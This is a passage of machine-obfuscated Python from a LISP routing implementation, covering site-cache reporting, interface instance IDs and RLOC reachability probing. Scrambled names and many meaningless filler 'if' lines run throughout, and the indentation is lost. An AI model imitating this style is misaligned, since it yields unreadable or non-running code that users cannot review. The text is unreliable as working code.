if 33 - 33: OOooOOo * OOooOOo . II111iiii % O0 % O0 % o0oOOo0O0Ooo
if 45 - 45: OoooooooOO * oO0o
if 74 - 74: ooOoO0o * I11i / oO0o - IiII + OoOoOO00
if 16 - 16: Oo0Ooo
iIiiI11II11i [ "rlocs" ] = o0O
if 29 - 29: Oo0Ooo . I1ii11iIi11i / II111iiii / oO0o / o0oOOo0O0Ooo + I11i
if 4 - 4: OoooooooOO % I1ii11iIi11i . OoO0O00 * o0oOOo0O0Ooo + I1ii11iIi11i * IiII
if 67 - 67: I1IiiI
if 93 - 93: ooOoO0o . Ii1I + IiII / Oo0Ooo % I11i
oO00Oo0OO . append ( iIiiI11II11i )
if 40 - 40: Oo0Ooo % OoOoOO00 . IiII / I1IiiI % OoooooooOO
return ( oO00Oo0OO )
if 33 - 33: OOooOOo - OoooooooOO . iII111i
if 2 - 2: I11i + i1IIi
if 52 - 52: I11i - OoO0O00 % I1Ii111 . OOooOOo
if 90 - 90: O0 - Oo0Ooo / i1IIi * iIii1I11I1II1 % o0oOOo0O0Ooo / oO0o
if 73 - 73: iII111i % iIii1I11I1II1 + o0oOOo0O0Ooo % Ii1I . II111iiii + IiII
if 55 - 55: OoOoOO00 * II111iiii / iII111i + OOooOOo / OoooooooOO
if 12 - 12: II111iiii * O0 - Oo0Ooo + o0oOOo0O0Ooo . Oo0Ooo + iIii1I11I1II1
def lisp_gather_site_cache_data ( se , data ) :
iIiiI11II11i = { }
iIiiI11II11i [ "site-name" ] = se . site . site_name
iIiiI11II11i [ "instance-id" ] = str ( se . eid . instance_id )
iIiiI11II11i [ "eid-prefix" ] = se . eid . print_prefix_no_iid ( )
if ( se . group . is_null ( ) == False ) :
iIiiI11II11i [ "group-prefix" ] = se . group . print_prefix_no_iid ( )
if 4 - 4: I1Ii111 - I1Ii111 / I1ii11iIi11i . i1IIi + I1ii11iIi11i / oO0o
iIiiI11II11i [ "registered" ] = "yes" if se . registered else "no"
iIiiI11II11i [ "first-registered" ] = lisp_print_elapsed ( se . first_registered )
iIiiI11II11i [ "last-registered" ] = lisp_print_elapsed ( se . last_registered )
if 18 - 18: iIii1I11I1II1 . ooOoO0o
oOOOo0o = se . last_registerer
oOOOo0o = "none" if oOOOo0o . is_null ( ) else oOOOo0o . print_address ( )
iIiiI11II11i [ "last-registerer" ] = oOOOo0o
iIiiI11II11i [ "ams" ] = "yes" if ( se . accept_more_specifics ) else "no"
iIiiI11II11i [ "dynamic" ] = "yes" if ( se . dynamic ) else "no"
iIiiI11II11i [ "site-id" ] = str ( se . site_id )
if ( se . xtr_id_present ) :
iIiiI11II11i [ "xtr-id" ] = "0x" + lisp_hex_string ( se . xtr_id )
if 68 - 68: o0oOOo0O0Ooo
if 36 - 36: Oo0Ooo . I11i + I1IiiI * i1IIi % Ii1I + OOooOOo
if 5 - 5: o0oOOo0O0Ooo % oO0o / OoO0O00
if 17 - 17: OoooooooOO - I1ii11iIi11i / OoO0O00 - I1Ii111 + i1IIi
if 6 - 6: Oo0Ooo - II111iiii
IiIiIiiII1I = [ ]
for OooOOoOO0OO in se . registered_rlocs :
I1I1iIiiiiII11 = { }
I1I1iIiiiiII11 [ "address" ] = OooOOoOO0OO . rloc . print_address_no_iid ( ) if OooOOoOO0OO . rloc_exists ( ) else "none"
if 33 - 33: I1Ii111 - I1IiiI + iII111i . OoOoOO00
if 91 - 91: OOooOOo / Ii1I / IiII * OOooOOo
if ( OooOOoOO0OO . geo ) : I1I1iIiiiiII11 [ "geo" ] = OooOOoOO0OO . geo . print_geo ( )
if ( OooOOoOO0OO . elp ) : I1I1iIiiiiII11 [ "elp" ] = OooOOoOO0OO . elp . print_elp ( False )
if ( OooOOoOO0OO . rle ) : I1I1iIiiiiII11 [ "rle" ] = OooOOoOO0OO . rle . print_rle ( False , True )
if ( OooOOoOO0OO . json ) : I1I1iIiiiiII11 [ "json" ] = OooOOoOO0OO . json . print_json ( False )
if ( OooOOoOO0OO . rloc_name ) : I1I1iIiiiiII11 [ "rloc-name" ] = OooOOoOO0OO . rloc_name
I1I1iIiiiiII11 [ "uptime" ] = lisp_print_elapsed ( OooOOoOO0OO . uptime )
I1I1iIiiiiII11 [ "upriority" ] = str ( OooOOoOO0OO . priority )
I1I1iIiiiiII11 [ "uweight" ] = str ( OooOOoOO0OO . weight )
I1I1iIiiiiII11 [ "mpriority" ] = str ( OooOOoOO0OO . mpriority )
I1I1iIiiiiII11 [ "mweight" ] = str ( OooOOoOO0OO . mweight )
if 68 - 68: I11i
IiIiIiiII1I . append ( I1I1iIiiiiII11 )
if 91 - 91: I11i
iIiiI11II11i [ "registered-rlocs" ] = IiIiIiiII1I
if 24 - 24: ooOoO0o . i1IIi - O0 + I11i
data . append ( iIiiI11II11i )
return ( [ True , data ] )
if 71 - 71: OoOoOO00
if 29 - 29: O0 . i11iIiiIii
if 51 - 51: IiII
if 53 - 53: O0
if 19 - 19: o0oOOo0O0Ooo / iII111i % OoOoOO00
if 65 - 65: o0oOOo0O0Ooo
if 89 - 89: iIii1I11I1II1 + OoooooooOO + i1IIi + OoooooooOO % IiII * OoO0O00
def lisp_process_api_site_cache_entry ( parms ) :
i1oO00O = parms [ "instance-id" ]
i1oO00O = 0 if ( i1oO00O == "" ) else int ( i1oO00O )
if 53 - 53: OOooOOo . IiII % I11i - OoO0O00 - Oo0Ooo
if 58 - 58: I1Ii111 / OoooooooOO . I11i % I1Ii111
if 8 - 8: Oo0Ooo % ooOoO0o / i11iIiiIii
if 54 - 54: IiII
I11I = lisp_address ( LISP_AFI_NONE , "" , 0 , i1oO00O )
I11I . store_prefix ( parms [ "eid-prefix" ] )
if 85 - 85: OOooOOo - i1IIi
if 10 - 10: I1ii11iIi11i
if 3 - 3: ooOoO0o * O0 / o0oOOo0O0Ooo
if 22 - 22: OoOoOO00 + OOooOOo . iII111i % iIii1I11I1II1 - I11i
if 23 - 23: OoOoOO00 * I1Ii111
o0o0o = lisp_address ( LISP_AFI_NONE , "" , 0 , i1oO00O )
if ( "group-prefix" in parms ) :
o0o0o . store_prefix ( parms [ "group-prefix" ] )
if 18 - 18: o0oOOo0O0Ooo % i11iIiiIii . Ii1I . O0
if 85 - 85: I1ii11iIi11i * iIii1I11I1II1 + o0oOOo0O0Ooo * OoO0O00
oO00Oo0OO = [ ]
Ii111i1 = lisp_site_eid_lookup ( I11I , o0o0o , False )
if ( Ii111i1 ) : lisp_gather_site_cache_data ( Ii111i1 , oO00Oo0OO )
return ( oO00Oo0OO )
if 25 - 25: o0oOOo0O0Ooo / Ii1I / Oo0Ooo . ooOoO0o - ooOoO0o * O0
if 14 - 14: O0 - Ii1I + iIii1I11I1II1 + II111iiii . ooOoO0o + Ii1I
if 25 - 25: OoO0O00 * oO0o
if 29 - 29: OOooOOo - I1Ii111 - i11iIiiIii % i1IIi
if 2 - 2: i11iIiiIii % iIii1I11I1II1 * OOooOOo
if 45 - 45: oO0o + i1IIi + iII111i + o0oOOo0O0Ooo * OOooOOo + ooOoO0o
if 83 - 83: OoO0O00 - ooOoO0o / OoooooooOO % iIii1I11I1II1 - II111iiii
def lisp_get_interface_instance_id ( device , source_eid ) :
i1i1111I = None
if ( device in lisp_myinterfaces ) :
i1i1111I = lisp_myinterfaces [ device ]
if 73 - 73: Oo0Ooo + II111iiii - IiII
if 60 - 60: i1IIi . i11iIiiIii / i1IIi . I11i % OOooOOo
if 47 - 47: oO0o + IiII * I1Ii111 % o0oOOo0O0Ooo - O0 % IiII
if 66 - 66: II111iiii * I1IiiI . Oo0Ooo * OoooooooOO % OoOoOO00 . II111iiii
if 4 - 4: iII111i + I1Ii111 % OoOoOO00 / Ii1I
if 94 - 94: OoO0O00
if ( i1i1111I == None or i1i1111I . instance_id == None ) :
return ( lisp_default_iid )
if 35 - 35: I1ii11iIi11i % OoO0O00 + II111iiii % II111iiii / IiII - iII111i
if 9 - 9: I1ii11iIi11i * o0oOOo0O0Ooo . oO0o
if 48 - 48: IiII . I1Ii111 + OoooooooOO - I1Ii111 . Ii1I . I1Ii111
if 24 - 24: ooOoO0o * iIii1I11I1II1
if 1 - 1: I1ii11iIi11i . O0
if 3 - 3: iIii1I11I1II1 * ooOoO0o - OoOoOO00 * I1ii11iIi11i % OoOoOO00 - OoooooooOO
if 42 - 42: I1Ii111 - i1IIi
if 91 - 91: iII111i . OOooOOo / iIii1I11I1II1 . Oo0Ooo . II111iiii . OoOoOO00
if 31 - 31: OoO0O00 . I1ii11iIi11i % I11i - II111iiii
i1oO00O = i1i1111I . get_instance_id ( )
if ( source_eid == None ) : return ( i1oO00O )
if 70 - 70: ooOoO0o - IiII - OoO0O00 / I11i
O0o0o000000 = source_eid . instance_id
o0O0OOo0O = None
for i1i1111I in lisp_multi_tenant_interfaces :
if ( i1i1111I . device != device ) : continue
oO00Ooo0O0 = i1i1111I . multi_tenant_eid
source_eid . instance_id = oO00Ooo0O0 . instance_id
if ( source_eid . is_more_specific ( oO00Ooo0O0 ) == False ) : continue
if ( o0O0OOo0O == None or o0O0OOo0O . multi_tenant_eid . mask_len < oO00Ooo0O0 . mask_len ) :
o0O0OOo0O = i1i1111I
if 14 - 14: oO0o % I11i . I1ii11iIi11i / OoooooooOO
if 91 - 91: II111iiii / O0
source_eid . instance_id = O0o0o000000
if 19 - 19: i11iIiiIii % I1Ii111 * II111iiii + iIii1I11I1II1
if ( o0O0OOo0O == None ) : return ( i1oO00O )
return ( o0O0OOo0O . get_instance_id ( ) )
if 1 - 1: oO0o / iIii1I11I1II1 * o0oOOo0O0Ooo * o0oOOo0O0Ooo % I1Ii111
if 98 - 98: I1Ii111 + iII111i * OoOoOO00 / II111iiii
if 56 - 56: iII111i . iIii1I11I1II1
if 44 - 44: OoooooooOO . i1IIi + Ii1I * O0 % i1IIi % I11i
if 98 - 98: I1IiiI - II111iiii % II111iiii % OOooOOo
if 6 - 6: OOooOOo
if 21 - 21: I1Ii111 - Ii1I - i1IIi % oO0o
if 55 - 55: OOooOOo + oO0o - II111iiii
if 5 - 5: iII111i * OoooooooOO . OoO0O00 % ooOoO0o + Ii1I
def lisp_allow_dynamic_eid ( device , eid ) :
if ( device not in lisp_myinterfaces ) : return ( None )
if 59 - 59: OoOoOO00
i1i1111I = lisp_myinterfaces [ device ]
ooooo = device if i1i1111I . dynamic_eid_device == None else i1i1111I . dynamic_eid_device
if 68 - 68: ooOoO0o * O0
if 1 - 1: I1ii11iIi11i
if ( i1i1111I . does_dynamic_eid_match ( eid ) ) : return ( ooooo )
return ( None )
if 85 - 85: I1ii11iIi11i
if 6 - 6: IiII % ooOoO0o . IiII . I1Ii111 - iIii1I11I1II1 + iIii1I11I1II1
if 30 - 30: OoooooooOO - ooOoO0o + Ii1I
if 88 - 88: II111iiii / Oo0Ooo . Oo0Ooo % o0oOOo0O0Ooo * OoOoOO00 . I1ii11iIi11i
if 32 - 32: OoooooooOO * I11i
if 86 - 86: I1Ii111 - i1IIi % O0
if 38 - 38: I1IiiI + OoO0O00 % iII111i / ooOoO0o
def lisp_start_rloc_probe_timer ( interval , lisp_sockets ) :
global lisp_rloc_probe_timer
if 93 - 93: OoOoOO00 . o0oOOo0O0Ooo - OoooooooOO
if ( lisp_rloc_probe_timer != None ) : lisp_rloc_probe_timer . cancel ( )
if 90 - 90: iIii1I11I1II1 . Ii1I / i11iIiiIii . oO0o . I11i - I11i
iii11I1i1i = lisp_process_rloc_probe_timer
Ii1111I = threading . Timer ( interval , iii11I1i1i , [ lisp_sockets ] )
lisp_rloc_probe_timer = Ii1111I
Ii1111I . start ( )
return
if 27 - 27: I1IiiI / II111iiii
if 36 - 36: ooOoO0o % i1IIi . ooOoO0o % oO0o % O0 . II111iiii
if 74 - 74: I1ii11iIi11i % I1IiiI
if 47 - 47: I1ii11iIi11i % I1IiiI . iII111i * I11i . I1IiiI + iII111i
if 53 - 53: iIii1I11I1II1
if 56 - 56: OoooooooOO % II111iiii + oO0o
if 67 - 67: ooOoO0o + I11i - I1ii11iIi11i - OoooooooOO
def lisp_show_rloc_probe_list ( ) :
lprint ( bold ( "----- RLOC-probe-list -----" , False ) )
for III11II111 in lisp_rloc_probe_list :
i1Ii1I1iii = lisp_rloc_probe_list [ III11II111 ]
lprint ( "RLOC {}:" . format ( III11II111 ) )
for I1I1iIiiiiII11 , I1i , o0O0Ooo in i1Ii1I1iii :
lprint ( " [{}, {}, {}, {}]" . format ( hex ( id ( I1I1iIiiiiII11 ) ) , I1i . print_prefix ( ) ,
o0O0Ooo . print_prefix ( ) , I1I1iIiiiiII11 . translated_port ) )
if 87 - 87: iII111i + IiII * I1ii11iIi11i . iII111i + Ii1I - II111iiii
if 87 - 87: OoOoOO00 . o0oOOo0O0Ooo + I1ii11iIi11i
lprint ( bold ( "---------------------------" , False ) )
return
if 53 - 53: o0oOOo0O0Ooo * II111iiii + i1IIi
if 83 - 83: I11i * o0oOOo0O0Ooo * Ii1I + OoooooooOO
if 76 - 76: I1ii11iIi11i . OoooooooOO + ooOoO0o / I1IiiI
if 56 - 56: Ii1I % I11i / O0 % O0 % iIii1I11I1II1 + I1IiiI
if 51 - 51: O0 * Ii1I / oO0o * OoooooooOO
if 93 - 93: I1ii11iIi11i . OOooOOo + i1IIi
if 30 - 30: Oo0Ooo + I1Ii111 / OOooOOo
if 74 - 74: iIii1I11I1II1
if 69 - 69: ooOoO0o % iIii1I11I1II1 * o0oOOo0O0Ooo + OoOoOO00 % I1Ii111 % Oo0Ooo
def lisp_mark_rlocs_for_other_eids ( eid_list ) :
if 64 - 64: iIii1I11I1II1 * Ii1I * ooOoO0o * i11iIiiIii
if 54 - 54: IiII . Ii1I
if 54 - 54: iII111i
if 2 - 2: OoOoOO00 + I1IiiI . ooOoO0o - oO0o . iIii1I11I1II1
OooOOoOO0OO , I1i , o0O0Ooo = eid_list [ 0 ]
ooo00ooOOO0 = [ lisp_print_eid_tuple ( I1i , o0O0Ooo ) ]
if 44 - 44: I11i
for OooOOoOO0OO , I1i , o0O0Ooo in eid_list [ 1 : : ] :
OooOOoOO0OO . state = LISP_RLOC_UNREACH_STATE
OooOOoOO0OO . last_state_change = lisp_get_timestamp ( )
ooo00ooOOO0 . append ( lisp_print_eid_tuple ( I1i , o0O0Ooo ) )
if 48 - 48: Oo0Ooo . IiII / ooOoO0o + I11i
if 40 - 40: I1IiiI + I1ii11iIi11i * I1IiiI % Ii1I
iiiII = bold ( "unreachable" , False )
o00oO = red ( OooOOoOO0OO . rloc . print_address_no_iid ( ) , False )
if 34 - 34: I1Ii111 % Ii1I / Oo0Ooo % ooOoO0o / i11iIiiIii * I1IiiI
for I11I in ooo00ooOOO0 :
I1i = green ( I11I , False )
lprint ( "RLOC {} went {} for EID {}" . format ( o00oO , iiiII , I1i ) )
if 36 - 36: i11iIiiIii * i1IIi % iII111i . Oo0Ooo
if 54 - 54: o0oOOo0O0Ooo % i1IIi % I1ii11iIi11i . o0oOOo0O0Ooo / OoOoOO00
if 55 - 55: O0 / OoooooooOO % Ii1I * O0 + iIii1I11I1II1 . iIii1I11I1II1
if 55 - 55: Ii1I . OoooooooOO % Ii1I . IiII
if 67 - 67: oO0o
if 12 - 12: I1IiiI + OoooooooOO
for OooOOoOO0OO , I1i , o0O0Ooo in eid_list :
I11 = lisp_map_cache . lookup_cache ( I1i , True )
if ( I11 ) : lisp_write_ipc_map_cache ( True , I11 )
if 25 - 25: iIii1I11I1II1 - I1IiiI . i11iIiiIii + ooOoO0o
return
if 19 - 19: OoooooooOO / IiII
if 40 - 40: OoOoOO00 / OoooooooOO * iIii1I11I1II1 / i1IIi . OoooooooOO
if 88 - 88: I1IiiI % I1IiiI / II111iiii - IiII
if 72 - 72: OoO0O00 - I1ii11iIi11i . Oo0Ooo / OoO0O00
if 86 - 86: i11iIiiIii - oO0o . i11iIiiIii
if 51 - 51: OoO0O00 - OoO0O00 * IiII
if 24 - 24: OoooooooOO . II111iiii
if 97 - 97: II111iiii . O0
if 18 - 18: iII111i
if 35 - 35: ooOoO0o / O0 / iIii1I11I1II1 - iIii1I11I1II1 + I11i
def lisp_process_rloc_probe_timer ( lisp_sockets ) :
lisp_set_exception ( )
if 8 - 8: I1Ii111 . oO0o % Oo0Ooo * OoooooooOO
lisp_start_rloc_probe_timer ( LISP_RLOC_PROBE_INTERVAL , lisp_sockets )
if ( lisp_rloc_probing == False ) : return
if 25 - 25: OoO0O00
if 54 - 54: O0
if 20 - 20: ooOoO0o + Oo0Ooo - Oo0Ooo
if 2 - 2: i1IIi - IiII . I1ii11iIi11i / i1IIi
if ( lisp_print_rloc_probe_list ) : lisp_show_rloc_probe_list ( )
if 92 - 92: ooOoO0o - iII111i
if 69 - 69: iII111i
if 48 - 48: O0 + o0oOOo0O0Ooo . oO0o - IiII * OoooooooOO . OoO0O00
if 63 - 63: oO0o * OoO0O00 * oO0o
i11i11 = lisp_get_default_route_next_hops ( )
if 89 - 89: iIii1I11I1II1
lprint ( "---------- Start RLOC Probing for {} entries ----------" . format ( len ( lisp_rloc_probe_list ) ) )
if 50 - 50: OOooOOo / i11iIiiIii / I1ii11iIi11i * OoooooooOO . OoO0O00
if 6 - 6: II111iiii % Ii1I / iIii1I11I1II1 % I1IiiI / iII111i % o0oOOo0O0Ooo
if 46 - 46: i11iIiiIii - Ii1I / OoooooooOO - OoO0O00
if 36 - 36: Ii1I * ooOoO0o * OoooooooOO + OoOoOO00
if 43 - 43: I1Ii111 - Oo0Ooo % i1IIi . II111iiii
IiI = 0
I1IO0O00o0oo0oO = bold ( "RLOC-probe" , False )
for O0O in list ( lisp_rloc_probe_list . values ( ) ) :
if 85 - 85: Ii1I * Oo0Ooo * ooOoO0o
if 48 - 48: i11iIiiIii
if 45 - 45: i1IIi + I1ii11iIi11i
if 49 - 49: i11iIiiIii . I1ii11iIi11i
if 91 - 91: ooOoO0o - OOooOOo - OOooOOo * o0oOOo0O0Ooo
iIiI1 = None
for oOIiII1I1I , I11I , o0o0o in O0O :
Oo0o = oOIiII1I1I . rloc . print_address_no_iid ( )
if 13 - 13: OoOoOO00 . IiII / i11iIiiIii - OOooOOo
if 9 - 9: II111iiii + i11iIiiIii % I1Ii111 - Oo0Ooo * OOooOOo
if 55 - 55: I1Ii111 + ooOoO0o
if 58 - 58: iII111i . I1ii11iIi11i - Oo0Ooo % o0oOOo0O0Ooo + I1Ii111
iI11Ii , OOoo0OOo , o00oOo0O0OO = lisp_allow_gleaning ( I11I , None , oOIiII1I1I )
if ( iI11Ii and OOoo0OOo == False ) :
I1i = green ( I11I . print_address ( ) , False )
Oo0o += ":{}" . format ( oOIiII1I1I . translated_port )
lprint ( "Suppress probe to RLOC {} for gleaned EID {}" . format ( red ( Oo0o , False ) , I1i ) )
if 82 - 82: iII111i + OoooooooOO % iIii1I11I1II1 - o0oOOo0O0Ooo - i1IIi / Oo0Ooo
continue
if 13 - 13: iII111i % oO0o - I11i . i11iIiiIii / iIii1I11I1II1
if 11 - 11: iII111i % OoO0O00 % iIii1I11I1II1 + IiII * Ii1I
if 93 - 93: OOooOOo / iII111i
if 74 - 74: I1ii11iIi11i
if 83 - 83: iII111i + i1IIi - OoooooooOO
if 16 - 16: i1IIi
if 86 - 86: OoOoOO00 - iII111i - Oo0Ooo
if ( oOIiII1I1I . down_state ( ) ) : continue
if 33 - 33: Ii1I - OoO0O00
if 15 - 15: O0 . iIii1I11I1II1 - I1Ii111 + O0 + ooOoO0o / I1IiiI
if 8 - 8: iII111i % O0 - OoOoOO00
if 49 - 49: oO0o - OOooOOo / Ii1I / I1Ii111 . o0oOOo0O0Ooo . iII111i
if 58 - 58: IiII + Ii1I
if 89 - 89: Ii1I / Oo0Ooo * o0oOOo0O0Ooo / OoO0O00 + I11i
if 4 - 4: I11i
if 59 - 59: OoOoOO00 * I1ii11iIi11i / I1IiiI * II111iiii + OoOoOO00
if 6 - 6: OoOoOO00 % oO0o + I11i * Ii1I
if 13 - 13: I1ii11iIi11i / Oo0Ooo - I1Ii111 * OoOoOO00
if 47 - 47: IiII
if ( iIiI1 ) :
oOIiII1I1I . last_rloc_probe_nonce = iIiI1 . last_rloc_probe_nonce
if 76 - 76: iII111i / II111iiii / I11i
if ( iIiI1 . translated_port == oOIiII1I1I . translated_port and iIiI1 . rloc_name == oOIiII1I1I . rloc_name ) :
if 62 - 62: I1ii11iIi11i
I1i = green ( lisp_print_eid_tuple ( I11I , o0o0o ) , False )
lprint ( "Suppress probe to duplicate RLOC {} for {}" . format ( red ( Oo0o , False ) , I1i ) )
if 100 - 100: iII111i / ooOoO0o / IiII % II111iiii
if 6 - 6: OoooooooOO - I1IiiI + OoooooooOO
if 89 - 89: oO0o % Oo0Ooo . O0 . ooOoO0o
if 46 - 46: IiII * I11i - OoO0O00 - Ii1I
if 93 - 93: iIii1I11I1II1 / o0oOOo0O0Ooo - I11i - OOooOOo % ooOoO0o
if 16 - 16: ooOoO0o * o0oOOo0O0Ooo - IiII + I1ii11iIi11i / o0oOOo0O0Ooo - O0
oOIiII1I1I . last_rloc_probe = iIiI1 . last_rloc_probe
continue
if 71 - 71: i1IIi
if 79 - 79: iII111i * O0 / Ii1I / O0 % i1IIi
if 52 - 52: OoooooooOO % oO0o - I11i % OoOoOO00 . II111iiii
ooOoOoO00OO0oooo = None
OooOOoOO0OO = None
while ( True ) :
OooOOoOO0OO = oOIiII1I1I if OooOOoOO0OO == None else OooOOoOO0OO . next_rloc
if ( OooOOoOO0OO == None ) : break
if 62 - 62: Ii1I . I1ii11iIi11i . iII111i + I11i * o0oOOo0O0Ooo
if 56 - 56: oO0o * iIii1I11I1II1 . II111iiii - II111iiii + II111iiii - i11iIiiIii
if 79 - 79: iII111i
if 29 - 29: Ii1I * I1Ii111 / OoO0O00 - O0 - i11iIiiIii * I1IiiI
if 2 - 2: OoOoOO00 . I1ii11iIi11i * I1ii11iIi11i
if ( OooOOoOO0OO . rloc_next_hop != None ) :
if ( OooOOoOO0OO . rloc_next_hop not in i11i11 ) :
if ( OooOOoOO0OO . up_state ( ) ) :
iiIi , iIIIio000 = OooOOoOO0OO . rloc_next_hop
OooOOoOO0OO . state = LISP_RLOC_UNREACH_STATE
OooOOoOO0OO . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( OooOOoOO0OO . rloc , False )
if 42 - 42: OoO0O00 . OoO0O00 + II111iiii - IiII - OOooOOo * Oo0Ooo
iiiII = bold ( "unreachable" , False )
lprint ( "Next-hop {}({}) for RLOC {} is {}" . format ( iIIIio000 , iiIi ,
red ( Oo0o , False ) , iiiII ) )
continue
if 47 - 47: oO0o - OoooooooOO + iII111i
if 69 - 69: I1ii11iIi11i - I1IiiI % oO0o + OOooOOo - I1Ii111
if 5 - 5: ooOoO0o . OoO0O00
if 40 - 40: iII111i
if 87 - 87: IiII / II111iiii
if 44 - 44: OoO0O00 . I1Ii111 - OoooooooOO * OoOoOO00 . OoO0O00
i1Ii = OooOOoOO0OO . last_rloc_probe
O0oO00OOooo0 = 0 if i1Ii == None else time . time ( ) - i1Ii
if ( OooOOoOO0OO . unreach_state ( ) and O0oO00OOooo0 < LISP_RLOC_PROBE_INTERVAL ) :
lprint ( "Waiting for probe-reply from RLOC {}" . format ( red ( Oo0o , False ) ) )
if 23 - 23: i1IIi . iIii1I11I1II1 / I1IiiI . OoOoOO00 . iII111i / IiII
continue
if 65 - 65: Ii1I + IiII + I11i / I1Ii111 % iIii1I11I1II1
if 17 - 17: I1ii11iIi11i * OOooOOo % II111iiii
if 30 - 30: I1Ii111 . Ii1I . Oo0Ooo / OOooOOo * OoooooooOO / I1ii11iIi11i
if 41 - 41: i1IIi
if 75 - 75: o0oOOo0O0Ooo . I1Ii111 - I1Ii111 % Ii1I * OoooooooOO
if 99 - 99: OOooOOo + o0oOOo0O0Ooo - OOooOOo . i1IIi
oo000O0o = lisp_get_echo_nonce ( None , Oo0o )
if ( oo000O0o and oo000O0o . request_nonce_timeout ( ) ) :
OooOOoOO0OO . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
OooOOoOO0OO . last_state_change = lisp_get_timestamp ( )
iiiII = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, nonce-echo failed" . format ( red ( Oo0o , False ) , iiiII ) )
if 86 - 86: Ii1I % oO0o - i11iIiiIii - O0 + IiII + iII111i
lisp_update_rtr_updown ( OooOOoOO0OO . rloc , False )
continue
if 100 - 100: OoO0O00 . Oo0Ooo
if 29 - 29: OoO0O00
if 34 - 34: O0 - o0oOOo0O0Ooo % OOooOOo . OoO0O00 % IiII
if 63 - 63: O0 % iIii1I11I1II1 . o0oOOo0O0Ooo . I1IiiI * Ii1I % i1IIi
if 47 - 47: II111iiii * I1ii11iIi11i
if 70 - 70: I1ii11iIi11i - o0oOOo0O0Ooo
if ( oo000O0o and oo000O0o . recently_echoed ( ) ) :
lprint ( ( "Suppress RLOC-probe to {}, nonce-echo " + "received" ) . format ( red ( Oo0o , False ) ) )
if 71 - 71: I1ii11iIi11i * i1IIi
continue
if 67 - 67: I1ii11iIi11i % OoOoOO00 . iII111i / Ii1I . I1IiiI
if 48 - 48: IiII + II111iiii . I1IiiI % o0oOOo0O0Ooo
if 57 - 57: OOooOOo . I11i % OoOoOO00
if 68 - 68: iIii1I11I1II1 % I1ii11iIi11i % II111iiii / O0 + iII111i
if 78 - 78: iII111i - OOooOOo / I1Ii111
if 38 - 38: I11i % i1IIi + o0oOOo0O0Ooo + I1ii11iIi11i + I1IiiI
if ( OooOOoOO0OO . last_rloc_probe != None ) :
i1Ii = OooOOoOO0OO . last_rloc_probe_reply
if ( i1Ii == None ) : i1Ii = 0
O0oO00OOooo0 = time . time ( ) - i1Ii
if ( OooOOoOO0OO . up_state ( ) and O0oO00OOooo0 >= LISP_RLOC_PROBE_REPLY_WAIT ) :
if 1 - 1: II111iiii * o0oOOo0O0Ooo . O0 - Ii1I / oO0o
OooOOoOO0OO . state = LISP_RLOC_UNREACH_STATE
OooOOoOO0OO . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( OooOOoOO0OO . rloc , False )
iiiII = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, probe it" . format ( red ( Oo0o , False ) , iiiII ) )
if 17 - 17: OoooooooOO % OoooooooOO + Oo0Ooo + I1Ii111
if 56 - 56: I11i % OoOoOO00 - OoO0O00
lisp_mark_rlocs_for_other_eids ( O0O )
if 31 - 31: iII111i % i11iIiiIii - Ii1I / OOooOOo - I1Ii111
if 60 - 60: o0oOOo0O0Ooo + Oo0Ooo . O0
if 51 - 51: i11iIiiIii / iIii1I11I1II1 . I1IiiI - Ii1I * I1Ii111 . iII111i
OooOOoOO0OO . last_rloc_probe = lisp_get_timestamp ( )
if 72 - 72: Ii1I . I11i / i1IIi % i1IIi + I1ii11iIi11i
OOOO0oO00 = "" if OooOOoOO0OO . unreach_state ( ) == False else " unreachable"
if 91 - 91: OoooooooOO % O0 * OoooooooOO . OOooOOo * I1Ii111 + OoO0O00
if 6 - 6: IiII + I11i / Ii1I / Oo0Ooo - oO0o
if 31 - 31: i11iIiiIii % oO0o + ooOoO0o - i1IIi
if 87 - 87: IiII + oO0o
if 87 - 87: ooOoO0o
if 47 - 47: i11iIiiIii
if 84 - 84: Ii1I + ooOoO0o
oOoo0000 = ""
iIIIio000 = None
if ( OooOOoOO0OO . rloc_next_hop != None ) :
iiIi , iIIIio000 = OooOOoOO0OO . rloc_next_hop
lisp_install_host_route ( Oo0o , iIIIio000 , True )
oOoo0000 = ", send on nh {}({})" . format ( iIIIio000 , iiIi )
if 62 - 62: OOooOOo - I1IiiI * oO0o + O0 / ooOoO0o * iIii1I11I1II1
if 25 - 25: I1Ii111 % Oo0Ooo + OoO0O00 % OOooOOo
if 85 - 85: I1IiiI . i11iIiiIii - ooOoO0o * I11i * OoOoOO00 * I11i
if 29 - 29: I1Ii111 * I1Ii111 . iII111i + o0oOOo0O0Ooo
if 57 - 57: I1Ii111 - IiII
i1o0 = OooOOoOO0OO . print_rloc_probe_rtt ( )
oO0O00 = Oo0o
if ( OooOOoOO0OO . translated_port != 0 ) :
oO0O00 += ":{}" . format ( OooOOoOO0OO . translated_port )
if 70 - 70: i11iIiiIii . II111iiii - IiII - O0 . O0 / IiII
oO0O00 = red ( oO0O00 , False )
if ( OooOOoOO0OO . rloc_name != None ) :
oO0O00 += " (" + blue ( OooOOoOO0OO . rloc_name , False ) + ")"
if 3 - 3: Oo0Ooo
lprint ( "Send {}{} {}, last rtt: {}{}" . format ( I1IO0O00o0oo0oO , OOOO0oO00 ,
oO0O00 , i1o0 , oOoo0000 ) )
if 10 - 10: IiII % OoO0O00 / OoO0O00 . ooOoO0o . IiII
if 38 - 38: I11i / iII111i - iIii1I11I1II1 + ooOoO0o + o0oOOo0O0Ooo . I1IiiI
if 96 - 96: IiII - I1IiiI . I1ii11iIi11i . O0
if 82 - 82: Ii1I % o0oOOo0O0Ooo . Oo0Ooo * OoO0O00 - Oo0Ooo
if 49 - 49: i11iIiiIii - I1IiiI * IiII
if 92 - 92: Oo0Ooo % O0 * Oo0Ooo
if 29 - 29: I1IiiI * iIii1I11I1II1 % ooOoO0o * OoO0O00 % Ii1I * I1ii11iIi11i
if 90 - 90: Ii1I + O0 % OoOoOO00
if ( OooOOoOO0OO . rloc_next_hop != None ) :
ooOoOoO00OO0oooo = lisp_get_host_route_next_hop ( Oo0o )
if ( ooOoOoO00OO0oooo ) : lisp_install_host_route ( Oo0o , ooOoOoO00OO0oooo , False )
if 18 - 18: iII111i . iIii1I11I1II1 . I1ii11iIi11i / OoO0O00 % OOooOOo
if 30 - 30: OoOoOO00 * i1IIi / i1IIi . IiII
if 8 - 8: IiII % o0oOOo0O0Ooo . i11iIiiIii
